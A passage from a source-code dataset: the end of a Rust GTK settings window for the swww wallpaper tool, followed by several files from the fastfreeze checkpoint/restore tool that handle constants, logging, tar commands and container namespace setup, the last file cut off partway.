create_category_box(); let transition_frames_per_second_label = create_label("Transition FPS"); let transition_frames_per_second_adjustment = Adjustment::new(30.0, 1.0, f64::from(u32::MAX), 1.0, 0.0, 0.0); let transition_frames_per_second_spinbutton = create_spinbutton(&transition_frames_per_second_adjustment); settings .bind( "swww-transition-fps", &transition_frames_per_second_spinbutton, "value", ) .build(); transition_bezier_fps_box.append(&transition_bezier_label); transition_bezier_fps_box.append(&transition_bezier_p0_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p1_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p2_spinbutton); transition_bezier_fps_box.append(&transition_bezier_p3_spinbutton); transition_bezier_fps_box.append(&transition_frames_per_second_label); transition_bezier_fps_box.append(&transition_frames_per_second_spinbutton); advanced_settings_window_box.append(&transition_bezier_fps_box); let window_hide_button = create_button("Confirm"); let restore_defaults_button = create_button("Restore Defaults"); restore_defaults_button.connect_clicked(move |_| { filter_dropdown.set_selected(SWWWScallingFilter::default().to_u32()); transition_step_spinbutton.set_value(90.0); transition_duration_spinbutton.set_value(3.0); transition_angle_spinbutton.set_value(45.0); transition_position_entry.set_text(&SWWWTransitionPosition::default().to_string()); invert_y_switch.set_state(false); transition_wave_width_spinbutton.set_value(200.0); transition_wave_height_spinbutton.set_value(200.0); transition_bezier_p0_spinbutton.set_value(SWWWTransitionBezier::default().p0); transition_bezier_p1_spinbutton.set_value(SWWWTransitionBezier::default().p1); transition_bezier_p2_spinbutton.set_value(SWWWTransitionBezier::default().p2); transition_bezier_p3_spinbutton.set_value(SWWWTransitionBezier::default().p3); transition_frames_per_second_spinbutton.set_value(30.0); }); let window_control_box = create_window_control_box(); window_hide_button.connect_clicked(clone!( #[weak] advanced_settings_window, move |_| { advanced_settings_window.set_visible(false); } )); window_control_box.append(&restore_defaults_button); window_control_box.append(&window_hide_button); advanced_settings_window_box.append(&window_control_box); }); } fn create_filter_dropdown(settings: &Settings) -> DropDown { let filter_dropdown = DropDown::from_strings(&[ &gettext("nearest"), &gettext("bilinear"), &gettext("catmullrom"), &gettext("mitchell"), &gettext("lanczos3"), ]); filter_dropdown.set_margin_top(12); filter_dropdown.set_margin_start(12); filter_dropdown.set_margin_bottom(12); filter_dropdown.set_margin_end(12); filter_dropdown.set_halign(Align::Start); filter_dropdown.set_valign(Align::Center); settings .bind("swww-scaling-filter", &filter_dropdown, "selected") .build(); filter_dropdown } fn create_transition_type_dropdown(settings: &Settings) -> DropDown { let transition_type_dropdown = DropDown::from_strings(&[ &gettext("none"), &gettext("simple"), &gettext("fade"), &gettext("left"), &gettext("right"), &gettext("top"), &gettext("bottom"), &gettext("wipe"), &gettext("wave"), &gettext("grow"), &gettext("center"), &gettext("any"), &gettext("outer"), &gettext("random"), ]); transition_type_dropdown.set_margin_top(12); transition_type_dropdown.set_margin_start(12); transition_type_dropdown.set_margin_bottom(12); transition_type_dropdown.set_margin_end(12); transition_type_dropdown.set_halign(Align::Start); transition_type_dropdown.set_valign(Align::Center); settings .bind( "swww-transition-type", &transition_type_dropdown, "selected", ) .build(); transition_type_dropdown } fn create_category_box() -> Box { Box::builder() .orientation(gtk::Orientation::Horizontal) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .hexpand(true) .vexpand(true) .build() } fn create_button(text: &str) -> Button { Button::builder() .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .label(gettext(text)) .halign(Align::End) .valign(Align::Center) .build() } fn create_spinbutton(adjustment: &Adjustment) -> SpinButton { SpinButton::builder() .adjustment(adjustment) .numeric(true) .halign(Align::Center) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .build() } fn create_point_spinbutton(adjustment: &Adjustment) -> SpinButton { SpinButton::builder() .adjustment(adjustment) .numeric(true) .halign(Align::Center) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .build() } fn create_label(text: &str) -> Label { Label::builder() .label(gettext(text)) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Center) .valign(Align::Center) .build() } fn create_window_control_box() -> Box { Box::builder() .orientation(gtk::Orientation::Horizontal) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::End) .valign(Align::Center) .hexpand(true) .vexpand(true) .build() } fn create_switch(text: &str) -> Switch { Switch::builder() .tooltip_text(gettext(text)) .has_tooltip(true) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build() } fn create_transition_position_entry() -> Entry { Entry::builder() .placeholder_text(gettext("Transition position")) .has_tooltip(true) .tooltip_text(gettext("Can either be floating point number between 0 and 0.99, integer coordinate like 200,200 or one of the following: center, top, left, right, bottom, top-left, top-right, bottom-left or bottom-right.")) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .halign(Align::Start) .valign(Align::Center) .build() }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/consts.rs
src/consts.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ time::Instant, path::PathBuf, }; use crate::util::{ gen_random_alphanum_string, get_home_dir, }; // This file gathers all fastfreeze hard-coded settings /// The image version must be bumped when libvirttime or libvirtcpuid change, /// or when the `ImageManifest` format changes. pub const CURRENT_IMG_VERSION: &str = "2021-03-22"; // We compute the paths at runtime. It improves readability compared to using // macros at compile time. lazy_static! { // We pick /var/tmp/fastfreeze for our directory and not /tmp because we place the // original ELF loader there (see libvirtcpuid). We want this to persist across reboot. // Also, /tmp is sometimes mounted with tmpfs, and that would be bad for us. // We need to pick a writable place, that can be hard-coded (the ELF loader // needs the absolute path at compile time). pub static ref FF_DIR: PathBuf = PathBuf::from("/var/tmp/fastfreeze"); pub static ref NO_PRESERVE_FF_DIR: PathBuf = FF_DIR.join("run"); pub static ref APP_CONFIG_PATH: PathBuf = FF_DIR.join("app-config.json"); pub static ref FF_LOG_DIR: PathBuf = FF_DIR.join("logs"); // XXX When changing any of the `LD` paths, libvirtcpuid must be recompiled // See variables set in dist/Makefile pub static ref LD_SYSTEM_PATH: PathBuf = PathBuf::from("/lib64/ld-linux-x86-64.so.2"); pub static ref LD_SYSTEM_ORIG_PATH: PathBuf = NO_PRESERVE_FF_DIR.join( LD_SYSTEM_PATH.file_name().unwrap()); // This path is not necessarily ideal for root users as apparmor needs to be configured to // whitelist this path. But for non-root users, it's best for doing kubernetes mounting. pub static ref LD_VIRTCPUID_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("ld-virtcpuid.so"); pub static ref LIBVIRTCPUID_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("libvirtcpuid.so"); pub static ref LIBVIRTTIME_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("libvirttime.so"); pub static ref LD_INJECT_ENV_PATH: PathBuf = FF_DIR.join("ld-inject.env"); pub static ref VIRT_TIME_CONF_PATH: PathBuf = FF_DIR.join("virttime-conf.bin"); pub static ref CRIU_SOCKET_DIR: PathBuf = NO_PRESERVE_FF_DIR.clone(); // XXX When changing this socket path, CRIU must be changed and recompiled. pub static ref NS_LAST_PID_SOCK_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("set_ns_last_pid.sock"); pub static ref LOCK_FILE_PATH: PathBuf = NO_PRESERVE_FF_DIR.join("lock"); // CONTAINERS_DIR holds container directories. Each is a private // /var/tmp/fastfreeze directory for a given container pub static ref CONTAINERS_DIR: PathBuf = PathBuf::from("/tmp/fastfreeze"); // The following paths are valid once we mound bind the container dir onto FF_DIR. pub static ref CONTAINER_PID: PathBuf = NO_PRESERVE_FF_DIR.join("pid"); pub static ref CONTAINER_PTY: PathBuf = NO_PRESERVE_FF_DIR.join("pty"); pub static ref CONTAINER_APP_TMP: PathBuf = FF_DIR.join("tmp"); pub static ref DEFAULT_IMAGE_DIR: PathBuf = get_home_dir().map(|h| h.join(".fastfreeze")) .expect("Failed to determine home directory. Please set $HOME."); } /// Arbitrary application PID. Has to be bigger than 300 due to the way we do PID control pub const APP_ROOT_PID: i32 = 1000; /// When storing images, we use this filename to store our manifest pub const MANIFEST_FILE_NAME: &str = "manifest.json"; /// Number of seconds to wait for processes to respond to a SIGTERM before sending a SIGKILL pub const KILL_GRACE_PERIOD_SECS: u64 = 3; /// Exit code we return when encountering a fatal error. /// We use 170 to distinguish from the application error codes. pub const EXIT_CODE_FAILURE: u8 = 170; /// Exit code to denote an error during restore. Meaning that passing --no-restore would help /// running the application. pub const EXIT_CODE_RESTORE_FAILURE: u8 = 171; /// When a process is running, we keep its stderr buffered, so that when an error /// comes, we can report the stderr in metrics. This constant indicates how many /// lines we want to report. Typically, we'll get something useful with the last /// 50 lines. Having too many lines makes error triage difficult. pub const STDERR_TAIL_NUM_LINES: usize = 50; /// The default encryption cipher for encrypting the image. /// We can let users define it in the future. pub const DEFAULT_ENCRYPTION_CIPHER: &str = "aes-256-cbc"; lazy_static! { /// The invocation ID is a random 6 digit alphanum string. It is is used in a few places: /// 1) The shard prefix name /// 2) The log file name /// 3) Emitting metrics pub static ref INVOCATION_ID: String = gen_random_alphanum_string(6); } /// Where libraries like libvirttime.so and libvirtcpuid.so are searched /// in addition to LD_LIBRARY_PATH. pub const LIB_SEARCH_PATHS: &[&str] = &["/lib64", "/usr/lib", "/usr/local/lib"]; pub const KB: usize = 1024; pub const MB: usize = 1024*1024; pub const GB: usize = 1024*1024*1024; pub const PAGE_SIZE: usize = 4*KB; lazy_static! { pub static ref START_TIME: Instant = Instant::now(); }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/logger.rs
src/logger.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #![allow(clippy::option_map_unit_fn)] use anyhow::{Result, Context}; use std::{ io::prelude::*, io::stderr, sync::Mutex, fs, path::{Path, PathBuf}, }; use log::{Record, Metadata}; pub use log::LevelFilter; use chrono::prelude::*; use crate::{ consts::*, util::{create_dir_all, set_tmp_like_permissions}, }; pub struct Logger { cmd_name: &'static str, log_file: Option<(fs::File, PathBuf)>, stdout_enabled: bool, } impl Logger { fn log(&mut self, record: &Record) { let msg = format!("[ff.{}] ({:.3}s) {}\n", self.cmd_name, START_TIME.elapsed().as_secs_f64(), record.args()); // When we fail to write to the outputs, we dismiss the errors. // Maybe there's something better to do. if self.stdout_enabled { let _ = stderr().write_all(msg.as_bytes()); } let _ = self.log_file.as_mut().map(|f| f.0.write_all(msg.as_bytes())); } fn flush(&mut self) { let _ = stderr().flush(); let _ = self.log_file.as_mut().map(|f| f.0.flush()); } fn move_file(&mut self, directory: &Path) -> Result<()> { if let Some((old_file, old_path)) = self.log_file.take() { // unwrap() is safe here: we always have a log filename let new_path = directory.join(old_path.file_name().unwrap()); // We first attempt to rename the log file. If we fail due to // moving a file cross-device, we copy, and re-open. self.log_file = Some(match fs::rename(&old_path, &new_path) { Err(e) if e.raw_os_error() == Some(libc::EXDEV) => { // We are moving the file cross devices. So we need to do a // copy, followed by re-opening the file. fs::copy(&old_path, &new_path).with_context(|| format!( "Failed to copy {} to {}", old_path.display(), new_path.display()))?; let new_file = fs::OpenOptions::new() .append(true) .open(&new_path) .with_context(|| format!("Failed to re-open log file at {}", new_path.display()))?; fs::remove_file(&old_path) .with_context(|| format!("Failed to unlink {}", old_path.display()))?; (new_file, new_path) }, Err(e) => Err(e).with_context(|| format!( "Failed to rename {} to {}", old_path.display(), new_path.display()))?, Ok(()) => (old_file, new_path), }) } Ok(()) } } lazy_static! { static ref LOGGER: Mutex<Option<Logger>> = Mutex::new(None); } pub fn is_logger_ready() -> bool { LOGGER.lock().unwrap().is_some() } pub fn move_log_file(directory: &Path) -> Result<()> { if let Some(logger) = LOGGER.lock().unwrap().as_mut() { create_dir_all(directory)?; logger.move_file(directory)?; } Ok(()) } pub struct LoggerRef(&'static Mutex<Option<Logger>>); impl log::Log for LoggerRef { fn enabled(&self, _metadata: &Metadata) -> bool { true } fn log(&self, record: &Record) { self.0.lock().unwrap().as_mut().map(|l| l.log(record)); } fn flush(&self) { self.0.lock().unwrap().as_mut().map(|l| l.flush()); } } fn open_log_file(cmd_name: &str) -> Result<(fs::File, PathBuf)> { create_dir_all(&*FF_LOG_DIR)?; // When using FastFreeze in container mode, logs are opened in this directory, // which can be shared with other users. So we make it /tmp like let _ = set_tmp_like_permissions(&*FF_LOG_DIR); // We pick a random log filename. This is because the log file is saved in the checkpoint // image. When we restore, we need to preserve the previous log. Having different log files // makes it easier to do so. let log_file_path = FF_LOG_DIR.join( format!("ff-{}-{}-{}.log", Utc::now().format("%Y%m%d-%H%M%S"), cmd_name, &*INVOCATION_ID)); let log_file = fs::OpenOptions::new() .create(true) .append(true) .open(&log_file_path) .with_context(|| format!("Failed to create log file at {}", log_file_path.display()))?; Ok((log_file, log_file_path)) } pub fn init(level: LevelFilter, cmd_name: &'static str, use_log_file: bool) -> Result<()> { // Initializing the logger twice would be a logic error, so it's safe to unwrap(). log::set_boxed_logger(Box::new(LoggerRef(&LOGGER))).unwrap(); log::set_max_level(level); let log_file = if use_log_file { Some(open_log_file(cmd_name)?) } else { None }; let logger = Logger { cmd_name, log_file, stdout_enabled: false }; LOGGER.lock().unwrap().replace(logger); if use_log_file { // We log the time, hostname and invocation ID in the log file, skipping stdout. let host = hostname::get().map_or_else( |err| format!("<{}>", err), |h| h.to_string_lossy().to_string()); warn!("Time is {}", Utc::now().to_rfc2822()); warn!("Host is {}", host); warn!("Invocation ID is {}", &*INVOCATION_ID); } LOGGER.lock().unwrap().as_mut().map(|l| l.stdout_enabled = true); Ok(()) }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/filesystem.rs
src/filesystem.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use std::{ path::PathBuf, collections::HashSet, fs, }; use crate::{ consts::*, process::{Command, Stdio}, }; lazy_static! { static ref TAR_CMD: String = std::env::var("TAR_CMD") .unwrap_or_else(|_| "tar".to_string()); } pub fn tar_cmd(preserved_paths: HashSet<PathBuf>, stdout: fs::File) -> Command { let mut cmd = Command::new(&[&*TAR_CMD]); // TODO We can't emit log lines during tarring, because we log them // And the log file is included in the tar archive. tar detects that the log file // is changing, and fails, ruining the fun. So we don't pass --verbose on tar for now // as it would emit output during tarring. We can come back to that issue later. /* if log_enabled!(log::Level::Trace) { cmd.arg("--verbose"); } */ cmd.args(&[ "--directory", "/", "--create", "--preserve-permissions", "--ignore-failed-read", // Allows us to discard EPERM errors of files in /tmp "--sparse", // Support sparse files efficiently, libvirttime uses one "--file", "-", ]) .arg("--exclude").arg(&*NO_PRESERVE_FF_DIR) .arg("--exclude").arg(&*CONTAINERS_DIR) .args(&preserved_paths) .arg(&*FF_DIR) .stdout(Stdio::from(stdout)); cmd } pub fn untar_cmd(stdin: fs::File) -> Command { let mut cmd = Command::new(&[&*TAR_CMD]); if log_enabled!(log::Level::Trace) { cmd.arg("--verbose"); } cmd.args(&[ "--directory", "/", "--extract", "--preserve-permissions", "--no-overwrite-dir", "--file", "-", ]) .stdin(Stdio::from(stdin)); cmd }
rust
Apache-2.0
af184605584c753ff13d37ffb9d349e2b9e381ad
2026-01-04T20:21:09.129173Z
false
twosigma/fastfreeze
https://github.com/twosigma/fastfreeze/blob/af184605584c753ff13d37ffb9d349e2b9e381ad/src/container.rs
src/container.rs
// Copyright 2020 Two Sigma Investments, LP. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. use anyhow::{Result, Context}; use std::{ fs, path::PathBuf, io::ErrorKind, path::Path, os::unix::io::{RawFd}, collections::HashSet, }; use nix::{ mount::{mount, MsFlags}, sched::{unshare, CloneFlags}, sys::signal::{self, kill}, sys::wait::{waitpid, WaitStatus}, sys::stat::Mode, unistd::{ fork, ForkResult, Pid, getuid, getgid, Uid, Gid, lseek64, Whence, dup2, close, }, errno::Errno, fcntl::{fcntl, FcntlArg, open, OFlag}, }; use caps::CapSet; use crate::{ consts::*, cli::{ExitCode, install, run::is_app_running}, process::{monitor_child, ChildDied}, util::{ create_dir_all, set_tmp_like_permissions, openat, setns, readlink_fd, get_inheritable_fds, is_term }, logger, }; /// FastFreeze requires the following to run applications: /// 1) Hijack the ELF system loader (/lib/ld-linux.so). This is important to achieve the following: /// a) Virtualize CPUID, which needs to happen before libc's ELF loader run. /// b) Force time user-space virtualization to all processes by LD_PRELOADing libvirttime. /// Even if a program clears the environment, our hijacking loader will set LD_PRELOAD before /// any program gets to initialize. /// /// 2) Control PIDs of processes. During restore, we need to have the same PIDs as /// during checkpointing. /// /// 3) Optionally, virtualize /dev/pts/N to avoid conflits. /// /// 4) Optionally, gain CAP_SYS_ADMIN (or CAP_CHECKPOINT_RESTORE) so that we can /// restore the /proc/self/exe link. /// /// We need a few namespaces to accomplish all this. /// a) First, we need a user namespace to be able to create other namespaces. This also /// gives us 4). /// b) Then we need a mount namespace, to do 1) and 3). /// c) Then we need a PID namespace to do 3). /// /// We distinguish 3 cases of operations: /// * NSCapabilities::Full: We have access to all namespaces. Great. /// * NSCapabilities::MountOnly: We don't have access to PID namespaces because /proc has /// subdirectories that are read-only mounted preventing a remount of /proc. This /// is typical within a Kubernetes environment. /// * NSCapabilities::None: We can't create any sort of namespaces. That's typical when running /// within Docker. In this case, our ELF loader must be installed manually, as root. /// This is done with `fastfreeze install`. /// Note that we don't want to set any of executables setuid. It makes them secure, /// which creates all sorts of problems, such as LD_LIBRARY_PATH not being honored. /// /// Note that only with NSCapabilities::Full can we run multiple applications at /// the same time (their PIDs will collide otherwise). This is why only in that case we /// mount bind /var/tmp/fastfreeze to /tmp/fastfreeze/app_name. /// /// The way the functionality of this file is the following: /// cli/run.rs calls ns_capabilities() to figure out what namespace we have available. It then /// figures out what to do. /// Under NSCapabilities::Full: /// - `create(app_name)` is called to create the namespaces. /// - `nsenter(app_name)` is called to enter the namespaces (used during checkpointing). /// Under NSCapabilities::MountOnly: /// - `create_without_pid_ns()` is called to create the user and mount namespace. /// - `nsenter_without_pid_ns()` is called to enter the namespaces. /// The `nsenter*()` functions are called from the same entry point, `maybe_nsenter_app()` #[derive(PartialEq)] pub enum NSCapabilities { None, MountOnly, Full, } impl NSCapabilities { pub fn has_restrictions(&self) -> bool { *self != Self::Full } pub fn can_mount_ns(&self) -> bool { *self != Self::None } } /// When /proc/sys is mounted read-only (or any other subpath of /proc), we won't /// be able to re-mount /proc. Attempting to create a container is futile in this case. pub fn ns_capabilities() -> Result<NSCapabilities> { fn test_in_child_process(child_fn: impl FnOnce() -> Result<()>) -> Result<bool> { match fork()? { ForkResult::Child => { let result = child_fn(); std::process::exit(if result.is_ok() { 0 } else { 1 }); } ForkResult::Parent { child } => { let result = waitpid(child, None)?; Ok(matches!(result, WaitStatus::Exited(_, 0))) }, } } let can_create_mount_ns = test_in_child_process(|| -> Result<()> { unshare(CloneFlags::CLONE_NEWUSER | CloneFlags::CLONE_NEWNS)?; Ok(()) })?; let can_create_pid_ns = test_in_child_process(|| -> Result<()> { // We don't call prepare_pid_namespace() because it does too much // The following is sufficient to test what we need unshare(CloneFlags::CLONE_NEWUSER | CloneFlags::CLONE_NEWNS | CloneFlags::CLONE_NEWPID)?; ensure!(test_in_child_process(|| -> Result<()> { let proc_mask = MsFlags::MS_NOSUID | MsFlags::MS_NODEV | MsFlags::MS_NOEXEC; mount(Some("proc"), "/proc", Some("proc"), proc_mask, None as Option<&str>)?; Ok(()) })?, "mount proc failed"); Ok(()) })?; let cap = match (can_create_mount_ns, can_create_pid_ns) { // Docker blocks the the use of namespaces with seccomp by default. // It's not a big deal. User can run `fastfreeze install` when creating the docker image. // run() will emit a proper error message. (false, _) => NSCapabilities::None, // We could be on Kubernetes, where we have a shadow /proc preventing us to // use a PID namespace correctly, but we can do mount namespaces. (true, false) => NSCapabilities::MountOnly, (true, true) => NSCapabilities::Full, // We don't consider the case where we can only create a pid ns, and not // a mount ns because it's very unlikely. }; // MountOnly deserves a debug message here as we want to report if /proc is read-only protected. if cap == NSCapabilities::MountOnly { let is_proc_ro_protected = || -> Result<bool> { let content = fs::read_to_string("/proc/self/mounts") .context("Failed to read /proc/self/mounts")?; // if we find a line like this: "proc /proc/sys proc ro,relatime 0 0", it's game over. for line in content.lines() { let line_elems = line.split_whitespace().collect::<Vec<_>>(); if let [_dev, path, _fstype, opts, ..] = *line_elems { if path.starts_with("/proc/sys") && opts.split(',').any(|x| x == "ro") { return Ok(true); } } } Ok(false) }; debug!("PID namespaces are not supported{}", if is_proc_ro_protected()? { " because /proc is read-only protected" } else { "" }); debug!("Running multiple applications is not supported, and controlling PIDs may be slow"); } Ok(cap) } // User namespace ////////////////////////////////// fn raise_all_effective_caps_to_ambient() -> Result<()> { // We raise all namespace capabilities to ambient to avoid permission issues. // We need CAP_SYS_ADMIN (or CAP_CHECKPOINT_RESTORE), at the very least. // for writing to /proc/sys/kernel/ns_last_pid. for cap in caps::read(None, CapSet::Effective)? { trace!("Raising {}", cap); caps::raise(None, CapSet::Inheritable, cap) .with_context(|| format!("Failed to make {} inheritable", cap))?; caps::raise(None, CapSet::Ambient, cap) .with_context(|| format!("Failed to make {} ambient", cap))?; } Ok(()) } fn prepare_user_namespace() -> Result<()> { // The user namespace gives us the ability to mount /proc, mount bind, and // control /proc/sys/kernel/ns_last_pid. let uid = getuid(); let gid = getgid(); unshare(CloneFlags::CLONE_NEWUSER) .context("Failed to create user namespace")?; raise_all_effective_caps_to_ambient()?; // We preserve our uid/gid to make things as transparent as possible for the user. // However, it doesn't always work on old kernels. So FF_FAKE_ROOT will drop uid to 0. let (new_uid, new_gid) = if std::env::var_os("FF_FAKE_ROOT").map_or(false, |v| v == "1") { (Uid::from_raw(0), Gid::from_raw(0)) } else { (uid, gid) }; fs::write("/proc/self/setgroups", "deny") .context("Failed to write to /proc/self/setgroups")?; fs::write("/proc/self/uid_map", format!("{} {} 1", new_uid, uid)) .context("Failed to write to /proc/self/uid_map")?; fs::write("/proc/self/gid_map", format!("{} {} 1", new_gid, gid)) .context("Failed to write to /proc/self/gid_map")?; Ok(()) } // FS namespace ////////////////////////////////// fn mount_bind(from: impl AsRef<Path>, to: impl AsRef<Path>) -> Result<()> { let from = from.as_ref(); let to = to.as_ref(); // It seems that we don't need to mount with MS_PRIVATE. mount(Some(from), to, None as Option<&str>, MsFlags::MS_BIND, None as Option<&str>) .with_context(|| format!("Failed to bind mount {} to {}", from.display(), to.display())) } fn prepare_fs_namespace(name: &str) -> Result<()> { // Note: When this function fails, there's no undo for has already been done. That's okay. // We create the directory that holds all the containers with /tmp-like // permissions to allow other users to use the same directory. It's okay if it fails create_dir_all(&*CONTAINERS_DIR)?; let _ = set_tmp_like_permissions(&*CONTAINERS_DIR); // We'll mount bind on FF_DIR. Its writability is not required. It can even // be owned by another user. Note that we probably already have this directory // created by the logger. create_dir_all(&*FF_DIR)?; // The mount namespace allows us to provide a private ff_dir=/var/tmp/fastfreeze // and hijack the system ELF loader. // It's also necessary for the PID namespace to provide a correct /proc mount. unshare(CloneFlags::CLONE_NEWNS) .context("Failed to create mount namespace")?; let private_ff_dir = CONTAINERS_DIR.join(name); let _ = fs::remove_dir_all(&private_ff_dir); create_dir_all(&private_ff_dir)?; // We relocate the log file in the container's log file directory. // This is helpful to preserve log files in checkpointed images. logger::move_log_file(&private_ff_dir.join("logs"))?; // It seems that we don't need to remount / with MS_SLAVE to make // our mounts private. mount_bind(&private_ff_dir, &*FF_DIR)?; install::prepare_ff_dir()?; mount_bind(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH)?; // We want to give the application a /tmp that we'll include in our image, // but we can't just mount bind it on /tmp. That's because it would be confusing // for users when trying to exchange files from the host to the containered app // via /tmp (for example when using Jupyter notebooks). // Setting TMPDIR to an empty directory is a good compromise. create_dir_all(&*CONTAINER_APP_TMP)?; let _ = set_tmp_like_permissions(&*CONTAINER_APP_TMP); std::env::set_var("TMPDIR", &*CONTAINER_APP_TMP); Ok(()) } // We are just hijacking the system ELF loader fn prepare_fs_namespace_virt_install_only() -> Result<()> { unshare(CloneFlags::CLONE_NEWNS) .context("Failed to create mount namespace")?; install::prepare_ff_dir()?; mount_bind(&*LD_VIRTCPUID_PATH, &*LD_SYSTEM_PATH)?; Ok(()) } fn cleanup_current_container() { // The container has died. We clean up the container pid file to speed up // the enumeration of running containers and also make it more reliable. let _ = fs::remove_file(&*CONTAINER_PID); // We remove NO_PRESERVE_FF_DIR and other files to save a bit of space. // This does not remove fastfreeze logs files and the tmpdir of the // application. Maybe the user wants to keep these files. It's fine because // these files reside on /tmp, which will get eventually cleaned away by the OS. let _ = fs::remove_file(&*LD_INJECT_ENV_PATH); let _ = fs::remove_file(&*VIRT_TIME_CONF_PATH); let _ = fs::remove_file(&*APP_CONFIG_PATH); let _ = nix::mount::umount(&*CONTAINER_PTY); // to avoid EBUSY when deleting. let _ = fs::remove_dir_all(&*NO_PRESERVE_FF_DIR); } // PTY "namespace" ////////////////////////////////// // Takes a slice of TTY fds, and return the path (/dev/pts/X) of the TTY. // Note that we take an array of TTY fds to ensure that they all point to the // same TTY, but semantically, we would be taking just a single fd. fn get_tty_path(tty_fds: &[RawFd]) -> Result<Option<PathBuf>> { if tty_fds.is_empty() { return Ok(None); } let paths = tty_fds.iter() .copied() .map(readlink_fd) .collect::<Result<HashSet<_>>>()?; assert!(!paths.is_empty()); ensure!(paths.len() == 1, "Multiple TTYs detected ({:?}), this is not supported", paths); Ok(paths.into_iter().next()) } fn prepare_pty_namespace(inheritable_tty_path: Option<&PathBuf>) -> Result<()> { // We need a new pts namespace during checkpoint/restore because: // 1) we pass the current pty (what we currently hold as stderr for example) // to the child. It needs to be deterministic because when we restore, it // needs to have the same name. We'll use /dev/pts/0 for passing down our pty. // 2) PTYs created in the container (by a program like tmux or sshd) // need to be conflict free when restoring (/dev/pts/N should be available), // so we need some amount of virtualization. // We want to mount new namespace on /dev/pts, but we want to map our current pty // to /dev/pts/0. We'll do some trickeries with mount binds to achieve that. // Another solution would be to create a new pty, and proxy data to/from our // current pty. But that's a bunch of pain, and not what we really want. // Step 1: Make a bind backup of our /dev/pts/N to CONTAINER_PTY because we are // about to hide it with the next mount. if let Some(ref tty_path) = inheritable_tty_path { debug!("Mapping PTY {} to a new PTY namespace as /dev/pts/0", tty_path.display()); fs::File::create(&*CONTAINER_PTY) .with_context(|| format!("Failed to create file {}", CONTAINER_PTY.display()))?; mount_bind(&tty_path, &*CONTAINER_PTY)?; } // Step 2: Make the /dev/pts namespace // We pass the ptmxmode=0666 option so that the permissions of /dev/ptmx is // accessible by all to create new PTYs, useful for applications like tmux // or sshd. // We wish to pass the options gid=5,mode=0620 (tty group) but we get // -EINVAL if we try, it has probably something to do with the way we map // our uid/gid in user_namespace(). This is not really important. mount(Some("devpts"), "/dev/pts", Some("devpts"), MsFlags::MS_NOSUID | MsFlags::MS_NOEXEC, Some("ptmxmode=0666")) .context("Failed to mount /dev/pts")?; mount_bind("/dev/pts/ptmx", "/dev/ptmx")?; // Step 3: mount bind CONTAINER_PTY to /dev/pts/0. // For this to work, /dev/pts/0 must exist. So we create a dummy pts // that we keep open to ensure that the mount bind survives. // We leak the fd on purpose so it doesn't get closed. if inheritable_tty_path.is_some() { let ptmx_fd = fs::OpenOptions::new() .read(true).write(true) .open("/dev/ptmx") .context("Failed to open /dev/ptmx to create a dummy PTY")?; std::mem::forget(ptmx_fd); mount_bind(&*CONTAINER_PTY, "/dev/pts/0")?; } Ok(()) } fn reopen_fds(inheritable_fds: &[RawFd], inheritable_tty_fds: &[RawFd]) -> Result<()> { fn reopen_fd(fd: RawFd, path: &Path) -> Result<()> { let flags = fcntl(fd, FcntlArg::F_GETFL)?; let flags = unsafe { OFlag::from_bits_unchecked(flags) }; let pos = match lseek64(fd, 0, Whence::SeekCur) { Ok(pos) => Some(pos), Err(e) if e.as_errno() == Some(Errno::ESPIPE) => None, 